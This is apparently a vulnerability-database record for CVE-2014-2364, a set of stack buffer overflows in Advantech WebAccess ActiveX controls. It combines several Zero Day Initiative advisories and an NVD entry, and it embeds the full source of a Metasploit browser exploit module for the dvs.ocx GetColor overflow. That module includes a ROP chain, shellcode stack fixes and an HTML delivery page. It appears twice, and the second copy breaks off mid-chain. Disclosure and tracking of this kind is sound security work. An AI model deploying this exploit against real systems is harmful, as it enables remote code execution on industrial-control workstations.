ID ZDI-14-252 Type zdi Reporter Anonymous Modified 2014-11-09T00:00:00
Description
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the CCDParameter method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.
{"hash": "c9e394d3e202e26ac1b8b98ba4187237ae7abc2ec115c9bda8d14cbaab4c55a4", "edition": 2, "title": "Advantech WebAccess dvs.ocx CCDParameter Stack Buffer Overflow Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the CCDParameter method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "viewCount": 1, "objectVersion": "1.2", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "cd1444668c6996c65c861b39ad51efd5", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "b07c6d4c71745c4e532bb7e29c747a02", "key": "description"}, {"hash": "6dfaa17335c47523fb0370027288700e", "key": "href"}, {"hash": "0e8f4f13c11de32dac689cf2a0ab4284", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "490ae535f10406daf6cedd9aff199d47", "key": "published"}, {"hash": "8ce495975825f7f31840fd9ddbbaabf7", "key": "references"}, {"hash": "7079c72c21415131774625ba1d64f4b0", "key": "reporter"}, {"hash": "209a0370359de063faa692a75b1b60fd", "key": "title"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}], "cvelist": ["CVE-2014-2364"], "bulletinFamily": "info", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-252", "history": [{"bulletin": {"hash": "3498cd80530afd4cbad927b40426f189cf4d34cea16ea72dd4891810f82dc048", "id": "ZDI-14-252", "title": "Advantech WebAccess dvs.ocx CCDParameter Stack Buffer Overflow Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the CCDParameter method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "viewCount": 0, "objectVersion": "1.2", "hashmap": [{"hash": "8ce495975825f7f31840fd9ddbbaabf7", "key": "references"}, {"hash": "3dd086b59554fe33c1b8f051475b4b31", "key": "type"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "6dfaa17335c47523fb0370027288700e", "key": "href"}, {"hash": "cd1444668c6996c65c861b39ad51efd5", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "490ae535f10406daf6cedd9aff199d47", "key": "published"}, {"hash": "7079c72c21415131774625ba1d64f4b0", "key": "reporter"}, {"hash": "b07c6d4c71745c4e532bb7e29c747a02", "key": "description"}, {"hash": "209a0370359de063faa692a75b1b60fd", "key": "title"}, {"hash": "9a10e9ed12ba0880a3e4c132dbded84d", "key": "modified"}], "cvelist": ["CVE-2014-2364"], "bulletinFamily": "info", "published": "2014-07-18T00:00:00", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "reporter": "Anonymous", "lastseen": "2016-09-04T11:34:02", "history": [], "modified": "2014-09-04T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-252", "type": "zdi"}, "lastseen": "2016-09-04T11:34:02", "edition": 1, "differentElements": ["modified"]}], "id": "ZDI-14-252", "reporter": "Anonymous", "published": "2014-07-18T00:00:00", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "lastseen": "2016-11-09T00:17:56", "modified": "2014-11-09T00:00:00", "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "vulnersScore": 9.3}, "type": "zdi"}
{"cve": [{"lastseen": "2016-09-03T20:13:48", "references": ["http://www.securityfocus.com/bid/68714", "http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02", "http://packetstormsecurity.com/files/128384/Advantech-WebAccess-dvs.ocx-GetColor-Buffer-Overflow.html"], "edition": 1, "description": "Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.", "reporter": "NVD", "published": "2014-07-19T01:09:27", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "CVE-2014-2364", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-2364"], "scanner": [], "modified": "2015-08-11T10:38:48", "cpe": ["cpe:/a:advantech:advantech_webaccess:7.1", "cpe:/a:advantech:advantech_webaccess:6.0", "cpe:/a:advantech:advantech_webaccess:5.0", "cpe:/a:advantech:advantech_webaccess:7.0"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2364", "id": "CVE-2014-2364", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-02-15T19:08:41", "references": [], "edition": 2, "description": "This Metasploit module exploits a buffer overflow vulnerability in Advantec WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user controlled data through the GetColor function. This Metasploit module has been tested successfully on Windows XP SP3 with IE6 and Windows 7 SP1 with IE8 and IE 9.", "reporter": "metasploit", "published": "2014-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Advantech WebAccess dvs.ocx GetColor Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2364"], "modified": "2014-09-24T00:00:00", "id": "1337DAY-ID-22683", "href": "https://0day.today/exploit/description/22683", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability in Advantec WebAccess. The\r\n vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to\r\n sprintf can be reached with user controlled data through the GetColor function.\r\n This module has been tested successfully on Windows XP SP3 with IE6 and Windows\r\n 7 SP1 with IE8 and IE 9.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-2364'],\r\n ['ZDI', '14-255'],\r\n ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'Retries' => false,\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => /MSIE/i,\r\n :ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },\r\n :clsid => \"{5CE92A27-9F6A-11D2-9D3D-000001155641}\",\r\n :method => \"GetColor\"\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\",\r\n # Patch the stack to execute the decoder...\r\n 'PrependEncoder' => \"\\x81\\xc4\\x9c\\xff\\xff\\xff\", # add esp, -100\r\n # Fix the stack again, this time better :), before the payload\r\n # is executed.\r\n 'Prepend' => \"\\x64\\xa1\\x18\\x00\\x00\\x00\" + # mov eax, fs:[0x18]\r\n \"\\x83\\xC0\\x08\" + # add eax, byte 8\r\n \"\\x8b\\x20\" + # mov esp, [eax]\r\n \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jul 17 2014'))\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Requested: #{request.uri}\")\r\n\r\n content = <<-EOS\r\n<html>\r\n<head>\r\n<meta http-equiv=\"cache-control\" content=\"max-age=0\" />\r\n<meta http-equiv=\"cache-control\" content=\"no-cache\" />\r\n<meta http-equiv=\"expires\" content=\"0\" />\r\n<meta http-equiv=\"expires\" content=\"Tue, 01 Jan 1980 1:00:00 GMT\" />\r\n<meta http-equiv=\"pragma\" content=\"no-cache\" />\r\n</head>\r\n<body>\r\n<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>\r\n<script language='javascript'>\r\ntest.GetColor(\"#{rop_payload(get_payload(cli, target_info))}\", 0);\r\n</script>\r\n</body>\r\n</html>\r\n EOS\r\n\r\n print_status(\"Sending #{self.name}\")\r\n send_response_html(cli, content, {'Pragma' => 'no-cache'})\r\n end\r\n\r\n # Uses gadgets from ijl11.dll 1.1.2.16\r\n def rop_payload(code)\r\n xpl = rand_text_alphanumeric(61) # offset\r\n xpl << [0x60014185].pack(\"V\") # RET\r\n xpl << rand_text_alphanumeric(8)\r\n\r\n # EBX = dwSize (0x40)\r\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\r\n xpl << [0xffffffff].pack(\"V\") # ecx value\r\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\r\n xpl << [0x9ffdafc9].pack(\"V\") # eax value\r\n xpl << [0x60022b97].pack(\"V\") # ADC EAX,60025078 # RETN\r\n xpl << [0x60024ea4].pack(\"V\") # MUL EAX,ECX # RETN 0x10\r\n xpl << [0x60018084].pack(\"V\") # POP EBP # RETN\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << [0x60029f6c].pack(\"V\") # .data ijl11.dll\r\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\r\n xpl << [0x60023588].pack(\"V\") # ECX => (&POP EBX # RETN)\r\n xpl << [0x6001f1c8].pack(\"V\") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret\r\n # EDX = flAllocationType (0x1000)\r\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\r\n xpl << [0xffffffff].pack(\"V\") # ecx value\r\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\r\n xpl << [0x9ffdbf89].pack(\"V\") # eax value\r\n xpl << [0x60022b97].pack(\"V\") # ADC EAX,60025078 # RETN\r\n xpl << [0x60024ea4].pack(\"V\") # MUL EAX,ECX # RETN 0x10\r\n # ECX = flProtect (0x40)\r\n xpl << [0x6002157e].pack(\"V\") # POP EAX # RETN\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << rand_text_alphanumeric(4) # padding\r\n xpl << [0x60029f6c].pack(\"V\") # .data ijl11.dll\r\n xpl << [0x60012288].pack(\"V\") # POP ECX # RETN\r\n xpl << [0xffffffff].pack(\"V\") # ecx value\r\n 0x41.times do\r\n xpl << [0x6001b8ec].pack(\"V\") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN\r\n end\r\n # EAX = ptr to &VirtualAlloc()\r\n xpl << [0x6001db7e].pack(\"V\") # POP EAX # RETN [ijl11.dll]\r\n xpl << [0x600250c8].pack(\"V\") # ptr to &VirtualAlloc() [IAT ijl11.dll]\r\n # EBP = POP (skip 4 bytes)\r\n xpl << [0x6002054b].pack(\"V\") # POP EBP # RETN\r\n xpl << [0x6002054b].pack(\"V\") # ptr to &(# pop ebp # retn)\r\n # ESI = ptr to JMP [EAX]\r\n xpl << [0x600181cc].pack(\"V\") # POP ESI # RETN\r\n xpl << [0x6002176e].pack(\"V\") # ptr to &(# jmp[eax])\r\n # EDI = ROP NOP (RETN)\r\n xpl << [0x60021ad1].pack(\"V\") # POP EDI # RETN\r\n xpl << [0x60021ad2].pack(\"V\") # ptr to &(retn)\r\n # ESP = lpAddress (automatic)\r\n # PUSHAD # RETN\r\n xpl << [0x60018399].pack(\"V\") # PUSHAD # RETN\r\n xpl << [0x6001c5cd].pack(\"V\") # ptr to &(# push esp # retn)\r\n xpl << code\r\n\r\n xpl.gsub!(\"\\\"\", \"\\\\\\\"\") # Escape double quote, to not break javascript string\r\n xpl.gsub!(\"\\\\\", \"\\\\\\\\\") # Escape back slash, to avoid javascript escaping\r\n\r\n xpl\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22683"}], "zdi": [{"lastseen": "2016-11-09T00:17:54", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Dave Weinstein\n\n HP Zero Day Initiative", "published": "2014-07-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Advantech WebAccess webvact.ocx ProjectName Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-241", "id": "ZDI-14-241", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:10", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied NodeName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Tom Gallagher", "published": "2014-07-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Advantech WebAccess webdact.ocx NodeName Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-244", "id": "ZDI-14-244", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:13", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the SetColor method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Anonymous", "published": "2014-07-18T00:00:00", "title": "Advantech WebAccess dvs.ocx SetColor Stack Buffer Overflow Remote Code Execution Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-253", "id": "ZDI-14-253", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:04", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Tom Gallagher", "published": "2014-07-18T00:00:00", "title": "Advantech WebAccess webdact.ocx ProjectName Stack Buffer Overflow Remote Code Execution Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-243", "id": "ZDI-14-243", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:15", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the AlarmImage method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Anonymous", "published": "2014-07-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Advantech WebAccess dvs.ocx AlarmImage Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-254", "id": "ZDI-14-254", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:04", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string used to set the IPAddress property before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Anonymous", "published": "2014-07-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Advantech WebAccess dvs.ocx IPAddress Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-248", "id": "ZDI-14-248", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:10", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the SetBaud method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Anonymous", "published": "2014-07-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Advantech WebAccess dvs.ocx SetBaud Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-247", "id": "ZDI-14-247", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:17:52", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the SetParameter method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Tom Gallagher", "published": "2014-07-18T00:00:00", "title": "Advantech WebAccess dvs.ocx SetParameter Stack Buffer Overflow Remote Code Execution Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-242", "id": "ZDI-14-242", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:18:07", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the ServerResponse method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Anonymous", "published": "2014-07-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Advantech WebAccess dvs.ocx ServerResponse Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-256", "id": "ZDI-14-256", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:17:47", "references": ["http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the DVC.DvcCtrl ActiveX Control in dvs.ocx. The control does not check the length of an attacker-supplied string in the GetColor method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.", "reporter": "Anonymous", "published": "2014-07-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Advantech WebAccess dvs.ocx GetColor Stack Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-2364"], "modified": "2014-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-14-255", "id": "ZDI-14-255", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:38", "references": [], "edition": 1, "description": "", "reporter": "juan vazquez", "published": "2014-09-24T00:00:00", "type": "packetstorm", "title": "Advantech WebAccess dvs.ocx GetColor Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2364"], "modified": "2014-09-24T00:00:00", "href": "https://packetstormsecurity.com/files/128384/Advantech-WebAccess-dvs.ocx-GetColor-Buffer-Overflow.html", "id": "PACKETSTORM:128384", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow vulnerability in Advantec WebAccess. The \nvulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to \nsprintf can be reached with user controlled data through the GetColor function. \nThis module has been tested successfully on Windows XP SP3 with IE6 and Windows \n7 SP1 with IE8 and IE 9. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2014-2364'], \n['ZDI', '14-255'], \n['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02'] \n], \n'DefaultOptions' => \n{ \n'Retries' => false, \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => Msf::OperatingSystems::WINDOWS, \n:ua_name => /MSIE/i, \n:ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') }, \n:clsid => \"{5CE92A27-9F6A-11D2-9D3D-000001155641}\", \n:method => \"GetColor\" \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'DisableNops' => true, \n'BadChars' => \"\\x00\\x0a\\x0d\\x5c\", \n# Patch the stack to execute the decoder... \n'PrependEncoder' => \"\\x81\\xc4\\x9c\\xff\\xff\\xff\", # add esp, -100 \n# Fix the stack again, this time better :), before the payload \n# is executed. \n'Prepend' => \"\\x64\\xa1\\x18\\x00\\x00\\x00\" + # mov eax, fs:[0x18] \n\"\\x83\\xC0\\x08\" + # add eax, byte 8 \n\"\\x8b\\x20\" + # mov esp, [eax] \n\"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 \n}, \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jul 17 2014')) \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Requested: #{request.uri}\") \n \ncontent = <<-EOS \n<html> \n<head> \n<meta http-equiv=\"cache-control\" content=\"max-age=0\" /> \n<meta http-equiv=\"cache-control\" content=\"no-cache\" /> \n<meta http-equiv=\"expires\" content=\"0\" /> \n<meta http-equiv=\"expires\" content=\"Tue, 01 Jan 1980 1:00:00 GMT\" /> \n<meta http-equiv=\"pragma\" content=\"no-cache\" /> \n</head> \n<body> \n<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object> \n<script language='javascript'> \ntest.GetColor(\"#{rop_payload(get_payload(cli, target_info))}\", 0); \n</script> \n</body> \n</html> \nEOS \n \nprint_status(\"Sending #{self.name}\") \nsend_response_html(cli, content, {'Pragma' => 'no-cache'}) \nend \n \n# Uses gadgets from ijl11.dll 1.1.2.16 \ndef rop_payload(code) \nxpl = rand_text_alphanumeric(61) # offset \nxpl << [0x60014185].pack(\"V\") # RET \nxpl << rand_text_alphanumeric(8) \n \n# EBX = dwSize (0x40) \nxpl << [0x60012288].pack(\"V\") # POP ECX # RETN \nxpl << [0xffffffff].pack(\"V\") # ecx value \nxpl << [0x6002157e].pack(\"V\") # POP EAX # RETN \nxpl << [0x9ffdafc9].pack(\"V\") # eax value \nxpl << [0x60022b97].pack(\"V\") # ADC EAX,60025078 # RETN \nxpl << [0x60024ea4].pack(\"V\") # MUL EAX,ECX # RETN 0x10 \nxpl << [0x60018084].pack(\"V\") # POP EBP # RETN \nxpl << rand_text_alphanumeric(4) # padding \nxpl << rand_text_alphanumeric(4) # padding \nxpl << rand_text_alphanumeric(4) # padding \nxpl << rand_text_alphanumeric(4) # padding \nxpl << [0x60029f6c].pack(\"V\") # .data ijl11.dll \nxpl << [0x60012288].pack(\"V\") # POP ECX # RETN \nxpl << 